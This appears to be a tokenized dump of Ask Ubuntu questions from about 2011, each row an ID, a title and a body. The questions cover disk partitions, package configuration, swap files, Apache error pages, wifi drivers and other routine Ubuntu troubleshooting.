sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash filesystem state : clean filesystem os type : linux block count : 65536000 reserved block count : 0 free blocks : 64459851 block size : 4096 as expected , same block count , 0 reserved blocks , but ... same free blocks ? didnt i just freed 12.5 gib ? $ df -h /dev/sda5 filesystem size used avail use % mounted on /dev/sda5 247g 188m 246g 1 % /media/backup looks like i did . avaliable space went up from 233 to 245.9 gib . gparted didnt care at all , showing exactly same info ! ( useless to post an identical screenshot ) what a huge mess ! i tried to document it as best as i could ... so , please can someone give me any clue on what 's going on here ? what are those misterious 4.11 gib missing from ntfs - > ext4 formatting ? why there are so many discrepancies between gparted , nautilus , tune2fs , df ? what is wrong with my math ? ( questions in bold scattered this post ) any help is appreciated . while i can not figure what is going on , i am serilously considering giving up on ext4 in favor of ntfs for everything but my / partition . thanks !
48499	where can i find the configure options used to build a package ?	i need to install asterisk 1.6.2.18 on ubuntu 10.10 i would like to know what the configure options were that were used to generate the ubuntu package of asterisk 1.6.2.7 . my favorite server distro is slackware and on that i just reference the slackbuild file to find out how a package was made and possibly customised in order to remake it with a newer source , but i can not figure this out on ubuntu . i am under time pressure now , so i would appreciate some pointers . thank you !
48503	ubuntu 11.04 hangs many times in a day	i upgraded from 10.10 to 11.04 , my pc hangs many times . what does hung mean here ? my mouse pointer is stuck and i ca n't use shortcut keys , and i ca n't run alt+f2 and incase i hear music , last song sequence is being repeated again and again . when does my pc hung ? 1.while hearing to songs in rhythm box . 2.while using firefox 4 . i am using unity , how can i fix this problem ?
48506	does ubuntu 11.04 recognize and work easily on a tablet ?	i want to buy a tablet pc and i 've seen a new dell with ubuntu 11.04 working perfectly . if i want to install ubuntu 11.04 , will it work easily ? how 's the process to install ubuntu with tablet definitions ?
48508	how do i verify an asc key fingerprint ?	at the moment , i 'm trying to check the fingerprint of the oracle_vbox.asc key that i downloaded from http : //www.virtualbox.org/wiki/linux_downloads : they provide the key and the fingerprint but no instructions for reviewing this information myself . how do i show the fingerprint of the key i just downloaded ? apt-key finger oracle_vbox.asc shows the fingerprints of all trusted keys , which is n't what i want .
48515	is there a secure web-shell for my server ?	following the security principle of trust no one , i ca n't use a service like http : //www.serfish.com/ . is there a free software program that i can install on my ubuntu server to give me secure shell access via a web-interface ? i would prefer a small and light-weight solution , so that i can do at least a rudimentary audit of the source code . i would also prefer something that is in the 'main ' repository , so that i get the benefit of stable release upgrades .
48517	directory name with space and bash	i 'd like to exclude the directories `` temp '' and `` ubuntu one/ '' from backup . what is the correct escaping of the space ? ? ? ? rsyncconf= '' -- delete -- exclude= . * -- exclude=temp/ '' thanks in advance ! chris edit/ps : excludes= ( `` . * '' temp/ `` ubuntu one/ '' ) ' 'rsyncconf= '' $ { excludes [ @ ] / # / -- exclude= } '' and $ rsync -e `` $ s '' -avr $ fromssh : $ source $ { rsyncconf [ @ ] } $ target $ today $ inc > > $ log 2 > & 1 did n't work . i 'd really appreciate any advice . this is the script : http : //wiki.ubuntuusers.de/_attachment ? target=skripte % 2fbackup_mit_rsync % 2fbackup.sh
48518	does ubuntu one offer windows live sync type services ?	i 'm an ubuntu convert from windows and i 'm liking it very much . one of the few things i miss in windows is their live sync . i do n't know what it 's like now or whether it still exists , but at the time ( 2008/2009 ) , windows live sync lets you sync folders between computers without uploading contents on their server . that is , only the metadata of the subscribed folders are uploaded ( things like changelog etc. ) . i really liked that , and i was wondering if ubuntu one has an option that does the same thing ? at the moment it only seems to have the option to upload all file contents on the web , and i 'd rather not do that . if ubuntu one does n't have the service similar to windows live sync as described above , then i really recommend it . i would greatly appreciate it if someone can point me to the right place to make my recommendations . thanks in advance !
48524	search for duplicate file names within folder hierarchy ?	i have a folder called img , this folder has many levels of sub-folders , all of which containing images . i am going to import them into an image server . normally images ( or any files ) can have the same name as long as they are in a different directory path or have a different extension . however , the image server i am importing them into requires all the image names to be unique ( even if the extensions are different ) . for example the images background.png and background.gif would not be allowed because even though they have different extensions they still have the same file name . even if they are in separate sub-folders , they still need to be unique . so i am wondering if i can do a recursive search in the img folder to find a list of files that have the same name ( excluding extension ) . is there a command that can do this ?
48526	how do i make midi playback work on a inspiron 531s ?	i have a windows vista inspiron 531s with ubuntu 11.04 & a realtek alc888 soundcard everything with ubuntu works fine except for midi playback in my softwares like noteworthy composer & such . could there be a way to fix this ? perhaps an audigy soundcard might be compatible with ubuntu 11.04 architecture . can anyone help me with this problem ?
48535	how to customize the ubuntu live cd ?	i would like to customize ubuntu live cd by installing some additional packages . i have followed this link but it does n't seems to work . can anyone provide clear instructions ? note : i do not prefer remastersys , manual way will be appreciated . customization packages that i want to install : thunderbird samba ssh changes that i need : remove games menu from the application menu firefox shortcut on desktop radiance as the default theme different default ubuntu wallpaper configuration file changes i want the panel to be placed at the bottom i want to paste my samba configuration file instead of default samba configuration i have few firefox shortcuts and folders i would like to show that in desktop also it will be nice if you say me how to change the icon sets recent updates i have customized ubuntu 10.10 with firefox shortcuts and few folders on desktops . everything went smooth . but the installer gets crashes after choosing the timezone . how do i fix this issue ? also setting wallpaper affects the login screen . the wallpaper which i set is displayed on the login screen also . i just want the default one for the login screen .
48544	why does partition table corruption even happen ?	i created an extended partition and tried to add two ntfs units to it . instead two 125 gb partitions , i got – according to disk utility – 2 x 982 gb partitions plus a 14574534 tb one ( wahey ! ) . i do n't remember to have done anything weird . the case is : neither disk utility , gparted or fdisk will let me fix/delete the extended partition , and in addition , my livecd wo n't boot , although the bios order is correct and it worked perfectly before ubuntu was installed . the hard drive installation of ubuntu will start instead ( edit – i got it to boot but having the drive unmounted does not fix the issue ) . i guess i could try even more tools but i do n't think this is that much of an unusual problem ... what 's the straight-forward solution for this ? thank you in advance .
48546	list of gui based torrent clients	what gui based torrent managers exist in ubuntu and features they offer in terms of : speed to start downloading ( search speed , seed , leech ) speed while downloading compatibility stability data check other attributes
48547	freezes for unknown reasons , causing fan to go crazy on a portege laptop	i have recently installed natty on a new toshiba portege laptop . i find it extremely irritating that the system freezes frequently , about every other time i use the computer . then the fan goes crazy and i have to force-shutdown . it seems to happen no matter what i do ; i encountered this problem when using firefox , libreoffice , adobe reader - probably when using only terminals too , but i 'm not certain . it may be fan-related , because the computer seems to get heated up compared compared to earlier , but i am not sure about that . any ideas why this could be happening ?
48553	could unity 2d and unity 3d merge	when looking at unity 2d and 3d and the future plans to use a software rendered version of compiz as the wm over metacity in unity 2d , the question comes to mind if there enough differences between the branches to have any value to having entirely separate trees for unity 2d and 3d ? having two branches seems to split effort which could go into improving the experience . is any thought being given to merging them together possibly sharing the qt code base ( as kde shows qt based environments can access accelerated graphics quite well ) ?
48555	how to set up a ubuntu server to be ( securely ) available from internet ?	( apologize in advance , i 'm a pro-windows newly converted to ubuntu ... if my questions are obvious , please tell me ) . i want to build a ubuntu server continuously connected to the internet . i own only ip address . the main purpose of the server is to serve as a source code controller ( probably git or svn ... have n't choose yet ) , but also some occasional other uses ( file sharing with family or customer , personal backup , host of web applications i may wrote , etc . i also would like to be able to access at any time to the computer to administer it , even behind some customer 's proxy that allows only http or https what are the standard steps to achieve that ? my first though is to set up openssh server . is it possible ( and `` quite '' secure ) to open it to the internet on standard port ( i.e . customer firewall/proxy compatible ) . is it possible to set up a vpn server , that is run from a webpage plugin ( also hosted by the server ) ? as i have only one ip address ( ip v4 and ipv 6 actually , but i do n't think ip v6 address will be accessible from customers network by now ) , can i make apache and other server software to coexists on the same standard ports ? thanks in advance ; )
48557	is there ( or will there be ) a os x client for u1 ?	i 'm interested in using ubuntu one but my other os is n't windows . yes , i 'm a mac - lol ! if there 's an existing client for mac os x , what is it and where do i get it ? if one does n't exist , i 'd be more than happy to test and/or help develop one for os x . please let me know . thank you !
48563	could anyone help me get my netgear wna3100 ( broadcom bcm43231 ) wireless adapter to work ?	i have just moved back to ubuntu from windows 7 and a few months ago , i bought a netgear wna3100 wireless adapter because my old adapter had broken . i plugged in my adapter and it does n't seem to work , i also used the windows 7 drivers for it and tried them on the program `` windows wireless drivers '' and they do n't seem to recognize the device . however i have heard you need xp drivers but i ca n't seem to find them on the internet nor find them on the cd . could anyone help me get my wireless adapter to work ? any help is greatly appreciate . p.s i do have internet connection though i have to tether my phone to my computer and then connect my phone to my router .
48568	how to configure opendns	i would like to configure my ubuntu and get the benefits of configuring opendns on my computer is a home computer , with dynamic ip 多 what packages i need to install ? 多 what configuration is necessary ? thanks. , p.s : i 'm not asking about how to include opendns server in my /etc/resolv.conf ... . possible problem : how can i access windows shares after changing dns servers ( e.g . switching to opendns ) ?
48602	bios issues since 11.04 ?	ever since i upgraded to 11.04 i have the following issues on my dual boot ( windows 7 ) system : - when i reboot from ubuntu , i will hear the bios beep twice and the bios will show a message that it could n't boot the first time ( hence the second beep ) , - when i shut down from ubuntu and cold boot my pc in windows the pc will suddenly reboot after login . the reboot is not caused by a bsod . my motherboard is an asus striker extreme . did anyone else have this weird issue ?
48614	strange invisible window causing 'dead zone ' in unity	i have a very strange problem . every so often a strange window will appear on the screen - well , i say `` appear '' , but it ca n't be seen . i know it 's there though . it creates a sort of 'dead zone ' on the screen - always in the same place . xwininfo : window id : 0xe1ce72 ( has no name ) absolute upper-left x : 438 absolute upper-left y : 299 relative upper-left x : 438 relative upper-left y : 299 width : 502 height : 222 depth : 0 visual : 0x21 visual class : truecolor border width : 0 class : inputonly colormap : 0x0 ( not installed ) bit gravity state : forgetgravity window gravity state : northwestgravity backing store state : notuseful save under state : no map state : isviewable override redirect state : yes corners : +438+299 -426+299 -426-247 +438-247 -geometry 502x222+438+299 i ca n't identify what process has created it , and i ca n't get rid of it without logging out ( xkill does nothing ) . any ideas for how i can find out what is opening the window ? has anyone else come across this happening ? ubuntu 11.04 linux laptop01 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux *update : * i am looking at the /usr/lib/unity/unity-panel-service process - i killed it , the process auto-restarted , and the window seems to have vanished . i will try it again next time it appears .
48615	stacks for unity launcher	i 'm looking forward to emulate the behavior of os x dock stacks so that i can have , for instance , one stack for browsers and another one for ides . people at ask ubuntu are doing a lot of cleaver stuff with custom launchers and quicklists ( see list of custom launchers & quicklists for unity ) . so has anyone figured out how to have stacks in unity ? anything fancier than a static quicklist over a dummy folder icon ?
48616	how do i print an image over multiple pages ?	i have a very tall image ( 880x9445 pixels ) which i would like to print ( specifically , to pdf ) . but when i print the image it always comes out as one page ; there does not seem to be any way to scale its width to a page and thus end up with multiple pages . i tried using the image viewer and gimp , is there anything else that will give me this option ?
48624	what are zombie processes ?	with commands like top and the gui based system monitor i can see that at the moment i have several zombie processes . what are zombie processes ? do they affect the performance of the system or the application they are zombie to . do they use too much memory or any memory at all ?
48629	problems with sudo permissions - /var/lib/sudo owned by uid	my system is a new 11.04 ubuntu and i recently started working with lamp . some how , when i tried to change permissions of the var/www/ for netbeans to work on the local server , and did something that causes this notice to show every time i do a sudo : sudo : /var/lib/sudo owned by uid 33 , should be uid 0 this is bad ? how can i fix it ? what exactly i did ? thanks .
48630	wine desktop is clipping on netbook	i have a windows program i run in wine that requires a desktop slightly taller then the vertical work space of my netbook 's screen when i create the desktop , wine clips it to fit the screen . i have to set it top all , grab it and move it up , press alt+f8 to resize it . is there a way to stop it from clipping in the first place . running with out a desktop , still clips it but then i can not resize or move it .
48633	'make ' error - glib.h no such file or directory	i have never built a project in ubuntu before and i am trying to come to grips with the gnu build tools and process . when i try to make i get the glib.h - no such file or directory . this is the output of pkg-config -- cflags -- libs glib-2.0 -i/usr/include/glib-2.0 -i/usr/lib/i386-linux-gnu/glib-2.0/include -l/usr/lib/i386-linux-gnu -lglib-2.0 i presume the above output are the compiler flags make uses ? any ideas ?
48634	how to only show certain partitions in external hdd ?	when i plug in my external hard drive with three partitions , it shows up as three drives . ( i know it 's supposed to be like that btw ) . is there any way to hide certain partitions ? i have ubuntu installed on my external hard drive , and i have three partitions on it : home , `` / '' , and swap . i use it to copy files directly to my external home partition so that they will already be in my home folder next time i boot from the drive . is there a way to only show my home partition when i plug it in ? obviously i still need to be able to access the `` / '' and `` swap '' , but only when i am booted up into ubuntu from the drive .
48635	recommended fstab options for /home partition	i will soon move my /home folder to a separate partition . there are hundreds of tutorials on how to do so , including here . while most agree on the basic steps , their details are very different . for copying files , for instance , some use rsync , some cp , and some find | cpio ( ill use rsync ) as for fstab entry , the options are puzzling me . the most common suggestions are : uuid=xxx /home ext3 nodev , nosuid 0 2 uuid=xxx /home ext3 defaults , error=remount-ro 0 1 uuid=xxx /home ext4 error=remount-ro 0 1 uuid=xxx /home ext3 defaults 1 2 its hard to know if those suggestions are outdated or obsolete . so , for ubuntu 10.04 onwards , what are the best / recommended parameters for an ext4 /home ? nodev , nosuid ? defaults ? nothing ? and , most important , why ? edit : so far , im inclined to use uuid=xxx /home ext4 nodev , nosuid 1 2 but i would like some background on that
48638	how to layout the filesystem for a small ssd and a big hdd ?	since i do n't use my laptop 's cd-drive i want to put a small ( 8 gb ) ssd into the cd-drive slot ( i 'll use a caddy similar to this one ) . i want to use compressed btrfs on the ssd and put all the data on the big hdd . i want to avoid unnecessary spin-ups . i want the system to be fast ... i want to minimize wearing of the ssd . how should i layout the mount points of my file-system ? how can i prevent the hdd to spin up at the same time ?
48639	empathy not connecting on school 's public wifi	empathy just sits trying to connect to my facebook and google talk accounts on my school 's public wifi . on the public wifi there is a proxy i have to connect to and register with ( just type in an email address ) and i can browse the web . services like ubuntu one , apt , and others work fine . i 've only found irssi and empathy unable to connect . google talk via gmail works fine too . i feel this is a network-port issue , but i do n't know how to resolve it . any ideas ? thanks !
48640	swap file creation success/failure ?	i just installed linux for the first time ( after 5 tries ) . i was trying to follow directions on creating a swap file from this website : http : //www.linux.com/news/software/applications/8208-all-about-linux-swap-space it was my first time using the console , and i do n't know if i succeeded or not . is there some way to tell if it worked ? here is what i typed : to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details . paul @ knight : ~/desktop $ dd if=/dev/zero of =/swapfile bs=1024 count=1048576 dd : unrecognized operand `of' try `dd -- help ' for more information . paul @ knight : ~/desktop $ dd if=/dev/zero of=/swapfile bs=1024 count=1048576 dd : opening `/swapfile ' : permission denied paul @ knight : ~/desktop $ sudo dd if=/dev/zero of=/swapfile bs=1024 count=1048576 [ sudo ] password for paul : 1048576+0 records in 1048576+0 records out 1073741824 bytes ( 1.1 gb ) copied , 49.6973 s , 21.6 mb/s paul @ knight : ~/desktop $ sudo mkswap /swapfile mkswap : /swapfile : warning : do n't erase bootbits sectors on whole disk . use -f to force . setting up swapspace version 1 , size = 1048572 kib no label , uuid=5e900a84-03ca-4a00-ad60-df4784abc7ef paul @ knight : ~/desktop $ sudo swapon /swapfile paul @ knight : ~/desktop $ etc/fstab bash : etc/fstab : no such file or directory paul @ knight : ~/desktop $ /etc/fstab/swapfile bash : /etc/fstab/swapfile : not a directory paul @ knight : ~/desktop $ /etc/fstab swapfile bash : /etc/fstab : permission denied paul @ knight : ~/desktop $ sudo /etc/fstab swapfile sudo : /etc/fstab : command not found paul @ knight : ~/desktop $ /swapfile bash : /swapfile : permission denied paul @ knight : ~/desktop $ sudo /swapfile sudo : /swapfile : command not found paul @ knight : ~/desktop $ i 'm totally new at this . also , my physical memory is 256 mb and my swap space is about twice that ( i think ) . my partition for linux ( xubuntu 11.04 ) is 50 gb . do i have a 1 gb swap file now ? or just a hole in my hard drive ? is a swap file as good as the swap space ? thank you in advance !
48647	can not search ubuntu one music store in banshee	whenever i try to search the ubuntu one music store from within banshee , i get the following poorly spelled error message : an error has occured [ sic ] ! sorry but we have encountered an error with your request , please click here to try again . the site does not appear down as i can click any of the suggested music on the front page . i just cant search . i 'm using 11.04 . i 'm new to ubuntu so everything is default . i 'm not doing anything fancy .
48648	vnc option does n't appear in vinagre / remote desktop viewer	it 's strange , but for some reason vnc does n't show up as an option in vinagre , and when i look at the installed plugins , vnc is n't checked , and when i click on it , it greys out . i 've completely removed and reinstalled it , but i 'm still not seeing an option for vnc . what did i do ?
48650	how can i regenerate the system v symbolic links ?	i accidentally deleted all of the symlinks in /etc/rc1.d/ . how can i regenerate them ?
48651	can not install grub due to `` can not stat `aufs ' '' error	i have installed these oss in the order give below *windows7 *ubuntu 11.04 *fedora 15 before installation of fedora 15 all was working fine . ubuntu grub shows windows and ubuntu in the list . when fedora 15 is installed ubuntu 's grub was lost . i am trying to restore ubuntu grub from ubuntu live usb drive.so that the fedora will chainload ubuntu grub . ubuntu @ ubuntu : ~ $ sudo grub-install -- boot-directory=/media/926afad4-4c2a-4f0f-8b2c- > 801e07c9ec26/boot /dev/sda2 /usr/sbin/grub-probe : error : can not stat `aufs ' . please help ?
48656	ca n't upgrade packages , it gets stuck on openjdk-6-jre-headless	i am using ubuntu maverick ( server ) . when i run : apt-get upgrade it gets stuck on : setting up openjdk-6-jre-headless ( 6b20-1.9.7-0ubuntu1 ) ... why ? and what can i do to stop it ? i tried removing it with apt-get but get this error : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so then i tried this : dpkg -- purge openjdk-6-jre-headless i got this : dpkg : dependency problems prevent removal of openjdk-6-jre-headless : openjdk-6-jre-lib depends on openjdk-6-jre-headless ( > = 6b17 ) . ca-certificates-java depends on openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) | java6-runtime-headless ; however : package openjdk-6-jre-headless is to be removed . package java6-runtime-headless is not installed . package openjdk-6-jre-headless which provides java6-runtime-headless is to be removed . ca-certificates-java depends on openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) | java6-runtime-headless ; however : package openjdk-6-jre-headless is to be removed . package java6-runtime-headless is not installed . package openjdk-6-jre-headless which provides java6-runtime-headless is to be removed . dpkg : error processing openjdk-6-jre-headless ( -- purge ) : dependency problems - not removing errors were encountered while processing : openjdk-6-jre-headless the thing is i think my db is using it ... not sure ... i am using cassandra with thrift ... yes , it 's getting a bit more complex ... # dpkg -- configure -a i get : dpkg : dependency problems prevent configuration of openjdk-6-jre : openjdk-6-jre depends on openjdk-6-jre-headless ( > = 6b20-1.9.7-0ubuntu1 ) ; however : package openjdk-6-jre-headless is not configured yet . dpkg : error processing openjdk-6-jre ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place dpkg : dependency problems prevent configuration of libaccess-bridge-java : libaccess-bridge-java depends on default-jre | openjdk-6-jre | sun-java6-jre ; however : package default-jre is not installed . package openjdk-6-jre is not configured yet . package sun-java6-jre is not installed . dpkg : error processing libaccess-bridge-java ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of icedtea-6-jre-cacao : icedtea-6-jre-cacao depends on openjdk-6-jre-headless ( = 6b20-1.9.7-0ubuntu1 ) ; however : package openjdk-6-jre-headless is not configured yet . dpkg : error processing icedtea-6-jre-cacao ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libaccess-bridge-java-jni : libaccess-bridge-java-jni depends on libaccess-bridge-java ( > = 1.26.2-5 ) ; however : package libaccess-bridge-java is not configured yet . dpkg : error processing libaccess-bridge-java-jni ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : openjdk-6-jre libaccess-bridge-java icedtea-6-jre-cacao libaccess-bridge-java-jni thanks again for any help .
48658	will it be safe for me to upgrade my maverick kernel to 2.6.39.1 ?	i did searched the faqs about kernel updates , here are somethings i wan na confirm i learned that i could go to http : //kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.39.1-oneiric/ to get latest kernel for 10.10 maverick , even though it 's named under oneiric . will there be any issue regarding to software updates and so forth after i installed the new kernel ? ( my worry is that all ppa is added based on maverick and now the kernel is different from the original one ) what other disadvantage will there be ?
48663	software sources requires gtk 2 and wo n't run on 11.04	i was trying to access settings in update manager to setup automatic updates . but the settings dialog does not pop up . can not access software sources from the ubuntu software center > edit > software sources ... either . when i try to run software sources from the terminal i get the following error . $ sudo software-properties-gtk traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 26 , in < module > gi.require_version ( 'gtk ' , '2.0 ' ) file `` /usr/lib/python2.7/dist-packages/gi/__init__.py '' , line 46 , in require_version raise valueerror ( 'namespace % s not available ' % namespace ) valueerror : namespace gtk not available i understand that the package is looking for gtk namespace and requires gtk version 2.0 trying to check what version of gtk is installed , i run the following and get $ apt-cache showpkg libgtk2.0-0 | more package : libgtk2.0-0 versions : 2.24.4-0ubuntu2 ( /var/lib/apt/lists/ubuntu % 2011.04 % 20 % 5fnatty % 20narwhal % 5f % 20- % 2 0release % 20i386 % 20 ( 20110426 ) _dists_natty_main_binary-i386_packages ) ( /var/lib/ap t/lists/us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages ) ( /va r/lib/dpkg/status ) description language : file : /var/lib/apt/lists/ubuntu % 2011.04 % 20 % 5fnatty % 20narwhal % 5f % 20- % 20release % 20i386 % 20 ( 20110426 ) _dists_natty_main_binary-i386_packages md5 : 3ed10be69b676a812afff2c7fdaa4017 how do i get software sources to run ? update : found a related question here.i have python2.5 installed , but have n't set up a symbolic link to it , and the above log mentions python2.7
48677	make gnote load faster	ever since i upgraded to 11.04 and started to use unity i 've been bothered by the time it takes to load gnote . in 10.10 i used gnome and the gnote plugin for the gnome panel which had gnote loaded in the background so that e.g . opening a new note in gnote took no time at all . what i 'm looking for in unity is a way to make gnote load faster or a way to make gnote behave as if it loaded faster . i can think of two ways to do this : preload gnote so that it starts faster whenever i decide to start it . automatically start gnote minimized every time unity starts .
48685	add another sata drive	i have installed ubuntu 10.10 x64 ( when i type `` arch '' in terminal , it outputs `` x86_64 '' ) , i have only one 250gb sata drive ( sata 0 ) at the moment where i have my os and apps installed . i am now purchasing a 1tb sata drive and will install that inside the machine on a separate sata controller ( sata1 ) , question is : a ) how will i format and use this drive to store my data ( music , ftp downloads , softwares ) b ) will it automatically be available when i restart my system ? any other advise you may wish to give with regards to a new drive . will be grateful for your answers kind regards rihatum
48689	errordocument 500 not working	i am testing a risk-free php application . so i have a file where i omit a ; to cause a 500 error . but the page i specified in errordocument 500 is not called ! it works with 404 though . my apache2.conf : serverroot `` /etc/apache2 '' # # the accept serialization lock file must be stored on a local disk . # lockfile $ { apache_lock_dir } /accept.lock # # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # # timeout : the number of seconds before receives and sends time out . # timeout 300 # # keepalive : whether or not to allow persistent connections ( more than # one request per connection ) . set to `` off '' to deactivate . # keepalive on # # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 15 # # # # server-pool size regulation ( mpm specific ) # # # prefork mpm # startservers : number of server processes to start # minspareservers : minimum number of server processes which are kept spare # maxspareservers : maximum number of server processes which are kept spare # maxclients : maximum number of server processes allowed to start # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_prefork_module > startservers 5 minspareservers 5 maxspareservers 10 maxclients 150 maxrequestsperchild 0 < /ifmodule > # worker mpm # startservers : initial number of server processes to start # maxclients : maximum number of simultaneous client connections # minsparethreads : minimum number of worker threads which are kept spare # maxsparethreads : maximum number of worker threads which are kept spare # threadlimit : threadsperchild can be changed to this maximum value during a # graceful restart . threadlimit can only be changed by stopping # and starting apache . # threadsperchild : constant number of worker threads in each server process # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_worker_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > # event mpm # startservers : initial number of server processes to start # maxclients : maximum number of simultaneous client connections # minsparethreads : minimum number of worker threads which are kept spare # maxsparethreads : maximum number of worker threads which are kept spare # threadsperchild : constant number of worker threads in each server process # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_event_module > startservers 2 maxclients 150 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxrequestsperchild 0 < /ifmodule > # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < files ~ `` ^\.ht '' > order allow , deny deny from all satisfy all < /files > # # defaulttype is the default mime type the server will use for a document # if it can not otherwise determine one , such as from filename extensions . # if your server contains mostly text or html documents , `` text/plain '' is # a good value . if most of your content is binary , such as applications # or images , you may want to use `` application/octet-stream '' instead to # keep browsers from trying to display binary files as though they are # text . # defaulttype text/plain # # hostnamelookups : log the names of clients or just their ip addresses # e.g. , www.apache.org ( on ) or 204.62.129.132 ( off ) . # the default is off because it 'd be overall better for the net if people # had to knowingly turn this feature on , since enabling it means that # each client request will result in at least one lookup request to the # nameserver . # hostnamelookups off # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog $ { apache_log_dir } /error.log # # loglevel : control the number of messages logged to the error_log . # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . # loglevel warn # include module configuration : include mods-enabled/*.load include mods-enabled/*.conf # include all the user configurations : include httpd.conf # include ports listing include ports.conf # # the following directives define some format nicknames for use with # a customlog directive ( see below ) . # if you are behind a reverse proxy , you might want to change % h into % { x-forwarded-for } i # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements include conf.d/ # include the virtual host configurations : include sites-enabled/ # # vscsdk # # the virtual hosts and the aliases include /my/conf/apache2/hosts i 've commented the file /etc/apache2/conf.d/localized-error-pages . my .htaccess ( php is an apache module ) : errordocument 404 /my/var/www/maintenance/http-404.php errordocument 500 /my/var/www/maintenance/http-500.php the contents of http-550.php server error ! works with 404 , fails with 500 . i 've also tried to enter an url instead of an absolute path , no go . what i get on 500 is browser vendor 500 page . any suggestions appreciated !
48693	how can i force wifi connection to only use ipv4 ?	i have broadcom bcm43224 wifi card with proprietary broadcom sta driver . at home wifi connection works well , but in the office when i ping some resource there is a lot of loss packets and i cant browse websites . i have tried another way to check internet connection - download file with wget . wget google.com - very slow speed wget -4 google.com - normal speed so , it seems that the problem is with the ipv6 configuration at the office , can i force my wifi connection to use only ipv4 and completely ignore ipv6 ? .
48695	the terminal is shown when shutting down or logging out	when i shut down my system or log out the terminal ( the one i reach with ctrl alt + f7 ) is sometimes shown before the login screen appears or before the computer is shut down . is there a way to stop this behavior ? more explicitly the terminal is shown instead of the splash screen . if i logout the terminal is sometimes shown for a second before the login screen appears . also , sometimes when i shutdown ( from within unity or gnome ) the terminal is shown instead of the splash screen , sometimes for the whole shutdown process or just for a second or two . i 've had this problem throughout 10.04 , 10.10 and 11.04 and i 've always used the standard ubuntu variant . i 've also noticed this happening on a fresh install of natty on a friends netbook , so it 's not local to my computers .
48700	is there software that can view .dwg files ?	is there software that can view .dwg files ?
48704	is there a way to never have to put in your password after you have logged in ?	i put my password in when i log in but after that i do n't want to type it again . when i use my laptop i only wants to put in my password when i log in and never when i 'm logged in . the point of this is that i do n't want to waste time typing my password every time i do some administrative task . i 'm the only user and is very tired of having to type my password over and over again .
48705	how do i stop my screen from constantly locking up ?	it is not a power-saving or screensaver issue , it is literally every 25 seconds that my screen either blacks out or blacks out and locks so i have to put my password in over and over . please help ! ( it has locked five times in the typing of this paragraph . )
48708	change niceness ( priority ) of a running process	is it possible to set a new nice level of a running process with a known id ? does this operation require root access , or just being the owner of the process ?
48710	connecting to wlan freezes system on asus eee pc 1001p	this might be a quite old problem , however i could n't find a solution for myself . i was using ubuntu 10.10 on my asus eee pc 1001p until i upgraded to natty . now , whenever i connect to a password secured wireless network , the system freezes and needs to be hard rebooted . it looks like this 'bug ' affects the whole eee-family . in this topic on ubuntuforums , the user 'linux_one ' states , that an update to the latest daily mainline kernel from the kernel-ppa would solve the issue . unfortunately , this did n't prove true for me . my system is also up-to-date right now . i doubt , that the problem lies in the kernel itself , since the wlan-drivers already caused trouble in the past . i 've been using the wireless fixes on http : //linuxon1001p.blogspot.com so far . any solution or hint is appreciated . i 'll give additional information if needed .
